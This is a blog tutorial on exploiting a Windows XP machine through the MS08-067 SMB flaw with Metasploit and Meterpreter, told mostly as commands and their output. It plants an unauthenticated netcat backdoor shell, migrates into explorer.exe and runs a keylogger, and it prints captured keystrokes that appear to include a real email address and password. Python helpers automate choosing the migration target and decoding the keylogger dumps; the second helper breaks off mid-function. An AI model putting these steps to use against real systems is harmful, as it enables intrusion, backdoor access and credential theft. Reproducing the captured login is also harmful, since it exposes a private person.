Wednesday, 9 November 2011

Playing with Meterpreter commands in the Metasploit Framework


This post goes further into Meterpreter in the Metasploit Framework than the previous article. Let's get straight to it: we assume the target is a Windows XP host with an SMB vulnerability (the attacking machine runs msfconsole on Windows, which is why local paths such as C:/asa appear below).


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 97 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 97 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf >
To list exploits you can use the show exploits command; here we narrow things down and assume we are going to use an exploit for a 2008 Microsoft security bulletin:
msf > search ms08
Matching Modules
================
Name                                                   Disclosure Date  Rank       Description
----                                                   ---------------  ----       -----------
auxiliary/admin/ms/ms08_059_his2006                    2008-10-14       normal     Microsoft Host Integration Server 2006 Command Execution Vulnerability
exploit/windows/browser/ms08_041_snapshotviewer        2008-07-07       excellent  Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
exploit/windows/browser/ms08_053_mediaencoder          2008-09-09       normal     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
exploit/windows/browser/ms08_070_visual_studio_msmask  2008-08-13       normal     Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow
exploit/windows/browser/ms08_078_xml_corruption        2008-12-07       normal     Internet Explorer Data Binding Memory Corruption
exploit/windows/smb/ms08_067_netapi                    2008-10-28       great      Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/smb_relay                          2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution
The search returns 7 matching modules for ms08 (six exploits and one auxiliary module); we will use ms08_067_netapi:
msf > use exploit/windows/smb/ms08_067_netapi
To find out which targets this exploit supports, enter the command below:
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:
Id  Name
--  ----
0   Automatic Targeting
1   Windows 2000 Universal
2   Windows XP SP0/SP1 Universal
3   Windows XP SP2 English (NX)
4   Windows XP SP3 English (NX)
5   Windows 2003 SP0 Universal
6   Windows 2003 SP1 English (NO NX)
7   Windows 2003 SP1 English (NX)
8   Windows 2003 SP1 Japanese (NO NX)
9   Windows 2003 SP2 English (NO NX)
10  Windows 2003 SP2 English (NX)
11  Windows 2003 SP2 German (NO NX)
12  Windows 2003 SP2 German (NX)
13  Windows XP SP2 Arabic (NX)
14  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
15  Windows XP SP2 Chinese - Simplified (NX)
16  Windows XP SP2 Chinese - Traditional (NX)
17  Windows XP SP2 Czech (NX)
18  Windows XP SP2 Danish (NX)
19  Windows XP SP2 German (NX)
20  Windows XP SP2 Greek (NX)
21  Windows XP SP2 Spanish (NX)
22  Windows XP SP2 Finnish (NX)
23  Windows XP SP2 French (NX)
24  Windows XP SP2 Hebrew (NX)
25  Windows XP SP2 Hungarian (NX)
26  Windows XP SP2 Italian (NX)
27  Windows XP SP2 Japanese (NX)
28  Windows XP SP2 Korean (NX)
29  Windows XP SP2 Dutch (NX)
30  Windows XP SP2 Norwegian (NX)
31  Windows XP SP2 Polish (NX)
32  Windows XP SP2 Portuguese - Brazilian (NX)
33  Windows XP SP2 Portuguese (NX)
34  Windows XP SP2 Russian (NX)
35  Windows XP SP2 Swedish (NX)
36  Windows XP SP2 Turkish (NX)
37  Windows XP SP3 Arabic (NX)
38  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
39  Windows XP SP3 Chinese - Simplified (NX)
40  Windows XP SP3 Chinese - Traditional (NX)
41  Windows XP SP3 Czech (NX)
42  Windows XP SP3 Danish (NX)
43  Windows XP SP3 German (NX)
44  Windows XP SP3 Greek (NX)
45  Windows XP SP3 Spanish (NX)
46  Windows XP SP3 Finnish (NX)
47  Windows XP SP3 French (NX)
48  Windows XP SP3 Hebrew (NX)
49  Windows XP SP3 Hungarian (NX)
50  Windows XP SP3 Italian (NX)
51  Windows XP SP3 Japanese (NX)
52  Windows XP SP3 Korean (NX)
53  Windows XP SP3 Dutch (NX)
54  Windows XP SP3 Norwegian (NX)
55  Windows XP SP3 Polish (NX)
56  Windows XP SP3 Portuguese - Brazilian (NX)
57  Windows XP SP3 Portuguese (NX)
58  Windows XP SP3 Russian (NX)
59  Windows XP SP3 Swedish (NX)
60  Windows XP SP3 Turkish (NX)
61  Windows 2003 SP2 Japanese (NO NX)
We choose 0, Automatic Targeting:
msf  exploit(ms08_067_netapi) > set target 0
target => 0
If you do not set a target it stays at the default, 0; the step above is shown only for information, in case you are on a different Metasploit version or a target that needs a specific entry. Be careful with manual selection: the target entry picks the return address for the overflow, and a wrong one usually crashes the Server service on the target instead of giving you a session.
With target 0 selected we list the payloads. The payload decides what the exploit does for us once the vulnerability is triggered: a command shell, a remote desktop via VNC, download and execute, and so on.
The command to list the payloads compatible with this exploit is:
msf  exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name                                             Disclosure Date  Rank    Description
----                                             ---------------  ----    -----------
generic/custom                                                    normal  Custom Payload
generic/debug_trap                                                normal  Generic x86 Debug Trap
generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
generic/tight_loop                                                normal  Generic x86 Tight Loop
windows/adduser                                                   normal  Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec                                             normal  Windows Executable Download and Execute
windows/exec                                                      normal  Windows Execute Command
windows/loadlibrary                                               normal  Windows LoadLibrary Path
windows/messagebox                                                normal  Windows MessageBox
windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
That is quite a list. Here we use Meterpreter, since Meterpreter is what we are practising:
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
With the payload set to windows/meterpreter/bind_tcp, we set the target host; the command is:
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.39
RHOST => 192.168.1.39
A bind payload makes the target listen (on LPORT, 4444 by default) and has the attacker connect in, so it only works when nothing filters inbound connections to the target; a reverse_tcp payload would have the target connect back to us instead. With everything set, we launch the attack with the exploit command:
msf  exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.39
[*] Meterpreter session 1 opened (192.168.1.30:1602 -> 192.168.1.39:4444) at 2011-11-06 06:49:29 +0700
Bingo, we are in Meterpreter. Automatic targeting fingerprinted the host over SMB and chose entry 4 from the target list. Note the direction of the connection as well: with bind_tcp it is our host (192.168.1.30) that connected to port 4444 on the target.
To find out which directory we are in on the target, enter pwd (we start in the working directory of the exploited service process):
meterpreter > pwd
C:\WINDOWS\system32
To see the working directory on our own machine, the command is getlwd (get local working directory):
meterpreter > getlwd
C:/Program Files/Rapid7/framework/msf3
To get the target's computer name, OS, architecture and system language:
meterpreter > sysinfo
Computer        : PC100
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
To see the target's routing table:
meterpreter > route
Network routes
==============
Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          192.168.1.1
127.0.0.0        255.0.0.0        127.0.0.1
192.168.1.0      255.255.255.0    192.168.1.39
192.168.1.39     255.255.255.255  127.0.0.1
192.168.1.255    255.255.255.255  192.168.1.39
224.0.0.0        240.0.0.0        192.168.1.39
255.255.255.255  255.255.255.255  192.168.1.39
To go up one directory level:
meterpreter > cd ..
This behaves like the Linux command rather than the cmd.exe habit of typing cd.. without a space: Meterpreter needs the space between cd and ..
To confirm we are now in C:\WINDOWS:
meterpreter > pwd
C:\WINDOWS
OK, now up to C:\:
meterpreter > cd ..
To list files and directories, use ls:
meterpreter > ls
Listing: C:\
============
Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100666/rw-rw-rw-  16299862   fil   2011-07-31 19:05:32 +0700  $Persi0.sys
100777/rwxrwxrwx  0          fil   2011-07-31 09:53:39 +0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2011-07-31 09:53:39 +0700  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2011-07-31 11:14:57 +0700  Documents and Settings
100444/r--r--r--  0          fil   2011-07-31 09:53:39 +0700  IO.SYS
100444/r--r--r--  0          fil   2011-07-31 09:53:39 +0700  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2008-04-14 04:13:04 +0700  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2011-09-17 20:36:28 +0700  Program Files
40777/rwxrwxrwx   0          dir   2011-07-31 11:13:25 +0700  System Volume Information
40777/rwxrwxrwx   0          dir   2011-07-31 19:05:25 +0700  WINDOWS
40777/rwxrwxrwx   0          dir   2011-07-31 18:18:42 +0700  Xitami
100666/rw-rw-rw-  211        fil   2011-07-31 09:44:42 +0700  boot.ini
100666/rw-rw-rw-  0          fil   2011-07-31 19:05:13 +0700  dfinstall.log
100444/r–r–r–  250048     fil   2008-04-14 06:01:44 +0700  ntldr
100666/rw-rw-rw-  301989888  fil   2011-11-06 19:55:04 +0700  pagefile.sys
Let's go into the xitami directory:
meterpreter > cd xitami
Show the contents of the xitami directory:
meterpreter > ls
Listing: C:\xitami
==================
Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:42 +0700  .
40777/rwxrwxrwx   0       dir   1980-01-01 15:00:00 +0700  ..
100666/rw-rw-rw-  6772    fil   2011-07-31 18:18:44 +0700  INSTALL.LOG
100777/rwxrwxrwx  81296   fil   1997-04-29 23:57:12 +0700  UNWISE.EXE
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:31 +0700  addons
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:32 +0700  cgi-bin
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:30 +0700  cgi-src
100666/rw-rw-rw-  8268    fil   2000-03-31 05:45:26 +0700  ddnsdef.xml
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:31 +0700  debug
100666/rw-rw-rw-  92      fil   2011-07-31 18:18:35 +0700  defaults.aut
100666/rw-rw-rw-  134     fil   2011-07-31 18:18:35 +0700  defaults.cfg
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:29 +0700  errors
100666/rw-rw-rw-  148     fil   1998-06-26 11:37:22 +0700  ftpadios.txt
100666/rw-rw-rw-  1303    fil   1998-08-05 07:20:28 +0700  ftpdirs.aut
100666/rw-rw-rw-  729     fil   1997-12-20 06:31:24 +0700  ftphello.txt
100666/rw-rw-rw-  1334    fil   1998-02-24 10:34:52 +0700  ftplogin.txt
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:28 +0700  ftproot
100666/rw-rw-rw-  1694    fil   1999-09-01 00:43:00 +0700  ftpusers.aut
100777/rwxrwxrwx  155648  fil   2000-04-22 10:34:26 +0700  gslgen.exe
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:31 +0700  headers
100666/rw-rw-rw-  5194    fil   2000-01-02 10:23:10 +0700  license.txt
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:42 +0700  logs
100666/rw-rw-rw-  15146   fil   2000-01-02 10:23:18 +0700  perlssi
100666/rw-rw-rw-  2628    fil   1999-12-08 12:24:48 +0700  pipedef.xml
100666/rw-rw-rw-  1335    fil   1998-10-14 11:05:58 +0700  readme.txt
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:31 +0700  temp
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:30 +0700  templates
40777/rwxrwxrwx   0       dir   2011-07-31 18:18:24 +0700  webpages
100666/rw-rw-rw-  940     fil   1999-06-05 00:38:24 +0700  xitami.aut
100666/rw-rw-rw-  64764   fil   2000-04-02 06:28:50 +0700  xitami.cfg
100777/rwxrwxrwx  704512  fil   2000-04-22 10:37:46 +0700  xiwin32.exe
100777/rwxrwxrwx  126976  fil   2000-04-21 09:44:36 +0700  xixlat.exe
The listing shows a file ftphello.txt; we can view its contents with cat, which works just like cat on Linux. For example:
meterpreter > cat ftphello.txt
#   This is the welcome text file for the FTP service.
#   Lines starting with '#' are ignored.
#   You can change this file, or (better) copy it and change the
#   ftp:welcome option.
#
XX    XXX XXX XXXXXXXXX X        XX     XX XXX   --------------------
- X-- X--- X----- X---- XX------- XX-- XX-- X--- www.imatix.com --
-- X X---- X----- X---- X X------ X X X X-- X---  (c) 1991-98   --
--- X----- X----- X---- X- X----- X- X- X-- X---                --
-- X X---- X----- X---- XXXXX---- X---- X-- X--- Windows - OS/2 --
- X-- X--- X----- X---- X--- X--- X---- X-- X--- UNIX - OpenVMS --
XXX    XX XXX    XXX   XXX   XXX XXX   XXX XXX   --------------------
Ready for login.  All accesses to this server are logged.
OK, now let's plant a backdoor with netcat. First we copy nc.exe from our machine to the target using Meterpreter's upload feature:
meterpreter > upload -r c:/asa/nc.exe c:/xitami
[*] uploading  : c:/asa/nc.exe -> c:/xitami
[*] uploaded   : c:/asa/nc.exe -> c:/xitami\nc.exe
After the upload we drop into a shell:
meterpreter > shell
Process 1116 created.
Channel 15 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\xitami>
In the shell we enter the command below so that netcat listens on port 7000 and hands cmd.exe to whoever connects over the network:
C:\xitami>nc -l -p 7000 -e cmd.exe
Two caveats. The listener has no authentication at all, so anyone who can reach port 7000 gets the same cmd.exe, and plain -l exits after the first client disconnects (the Windows build's -L option keeps listening). Also, nc runs in the foreground here and blocks this shell channel; press Ctrl-Z to background the channel if you want to keep using the Meterpreter session meanwhile. After that we switch to our own machine and use a command like this there:

OK, let's continue.
Now we will try installing a keylogger on the target.
First we list the processes on the target with ps:
meterpreter > ps
Process list
============
PID   Name              Arch  Session  User                          Path
---   ----              ----  -------  ----                          ----
0     [System Process]
4     System            x86   0        NT AUTHORITY\SYSTEM
624   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
696   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
720   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
764   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
776   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
936   DF5Serv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
972   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
1068  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1152  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
1292  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1452  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
1532  explorer.exe      x86   0        PC100\data                    C:\WINDOWS\Explorer.EXE
1648  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
1184  wscntfy.exe       x86   0        PC100\data                    C:\WINDOWS\system32\wscntfy.exe
1300  alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
1760  xiwin32.exe       x86   0        PC100\data                    C:\Xitami\xiwin32.exe
348   FrzState2k.exe    x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
2032  cmd.exe           x86   0        PC100\data                    C:\WINDOWS\system32\cmd.exe
Note that explorer.exe above runs as PID 1532 under the logged-on user PC100\data. Our session still lives in the exploited Server service, which runs as SYSTEM but is not attached to the user's interactive desktop, and the keystroke sniffer only captures the desktop of the process it runs in; so we migrate into explorer.exe, PID 1532. Migrating also means the session now runs with that user's privileges rather than SYSTEM. Also note DF5Serv.exe and FrzState2k.exe in the listing: Faronics Deep Freeze is installed, so anything written to a frozen drive (the nc.exe we uploaded, the hosts file changed below) is discarded at the next reboot. The migrate command is:
meterpreter > migrate 1532
[*] Migrating to 1532...
[*] Migration completed successfully.
Then we check with getpid to confirm the migration:
meterpreter > getpid
Current pid: 1532
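Choosing the migration target by hand from the ps listing works, but the rule behind it can be automated. The following is an added example, not code from the post or from Metasploit: it parses a Meterpreter ps listing (the sample is a trimmed copy of the one above) and returns the PID of the explorer.exe owned by an interactive user rather than a service account. The column layout it assumes (fields separated by two or more spaces, trailing columns omitted for PID 0 and PID 4) is taken from the listing above.

```python
"""Choose a migration target from a Meterpreter 'ps' listing.

Added example, not code from the original post or from Metasploit. It parses
the column-aligned text that ps prints (columns separated by two or more
spaces; trailing columns absent for PID 0 and PID 4) and picks the
explorer.exe owned by an interactive user rather than a service account,
because the keystroke sniffer only sees the desktop of the process it runs in.
"""
import re

# Trimmed copy of the ps output shown above; the Path column is missing for the
# first two rows exactly as in the real listing.
SAMPLE_PS = r"""
PID   Name              Arch  Session  User                          Path
---   ----              ----  -------  ----                          ----
0     [System Process]
4     System            x86   0        NT AUTHORITY\SYSTEM
720   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
1068  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1532  explorer.exe      x86   0        PC100\data                    C:\WINDOWS\Explorer.EXE
1760  xiwin32.exe       x86   0        PC100\data                    C:\Xitami\xiwin32.exe
2032  cmd.exe           x86   0        PC100\data                    C:\WINDOWS\system32\cmd.exe
"""

COLUMNS = ("pid", "name", "arch", "session", "user", "path")
SERVICE_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}


def parse_ps(text):
    """One dict per process row; columns the listing omits are set to None."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or not line[0].isdigit():
            continue  # blank, header or separator line
        fields = re.split(r"\s{2,}", line)
        fields += [None] * (len(COLUMNS) - len(fields))
        row = dict(zip(COLUMNS, fields))
        row["pid"] = int(row["pid"])
        rows.append(row)
    return rows


def migration_candidates(rows, name="explorer.exe"):
    """Processes called `name` that run as a real user, i.e. own a desktop."""
    return [
        r for r in rows
        if r["name"].lower() == name.lower()
        and r["user"] is not None
        and r["user"].upper() not in SERVICE_ACCOUNTS
    ]


def pick_migration_pid(text, name="explorer.exe", session=None):
    """PID to hand to `migrate`, or None if there is no single obvious choice
    (nobody logged on, or several desktops: then pass the session number)."""
    cands = migration_candidates(parse_ps(text), name)
    if session is not None:
        cands = [r for r in cands if r["session"] == str(session)]
    return cands[0]["pid"] if len(cands) == 1 else None


if __name__ == "__main__":
    print("migrate", pick_migration_pid(SAMPLE_PS))
```

The function deliberately refuses to guess when there are several explorer.exe processes (several logged-on sessions) or none at all; in the first case pick by session number, in the second there is no user desktop to sniff yet.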
Once it matches, we start the keylogger on the target with keyscan_start:
meterpreter > keyscan_start
Starting the keystroke sniffer...
To see what the keylogger has captured:
meterpreter > keyscan_dump
Dumping captured keystrokes...
backup password <Return> username : cew_saturnus1987@yahooc <Back> .com <Return> password : adaajadeh <Return>  <Return>
Bingo: what the target typed is shown above. Read the special keys literally: <Back> is a backspace, so "yahooc <Back> .com" means the user ended up with yahoo.com, and each <Return> ends a line.
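The raw keyscan_dump line is not the text the user saw: <Back> erased a character and <Return> ended each line. Here is an added example (not code from the post or from Metasploit) that replays such a transcript into the entered lines and pulls out label : value pairs. It assumes keyscan_dump pads each special-key token with one space on either side, as the output above suggests; the sample transcript is constructed with placeholder values.

```python
"""Replay a Meterpreter keyscan_dump transcript into what the user actually typed.

Added example for this post, not code from Metasploit. The token format
(special keys as <Name>, padded with one space on each side, and ordinary
characters verbatim) is inferred from the keyscan_dump output above; the
one-space padding rule is an assumption, so a typed double space next to a
special key is collapsed.
"""
import re

TOKEN = re.compile(r"<([A-Za-z0-9]+)>")

# Constructed sample with the same shape as the dump above (placeholder values).
SAMPLE_DUMP = ("backup password <Return> username : alice@examplec <Back> .com "
               "<Return> password : hunter2 <Return>  <Return>")


def _unpad(segment, token_before, token_after):
    """Drop the single space keyscan_dump puts before and after a <Token>."""
    if token_before and segment.startswith(" "):
        segment = segment[1:]
    if token_after and segment.endswith(" "):
        segment = segment[:-1]
    return segment


def replay_keyscan(dump):
    """Return the lines the victim entered: <Back> deletes the previous character,
    <Return> ends a line, other special keys (Shift, Ctrl, Tab, ...) add no text."""
    dump = dump.rstrip("\r\n")
    lines, current, pos, token_before = [], [], 0, False
    for m in TOKEN.finditer(dump):
        current.extend(_unpad(dump[pos:m.start()], token_before, True))
        key = m.group(1)
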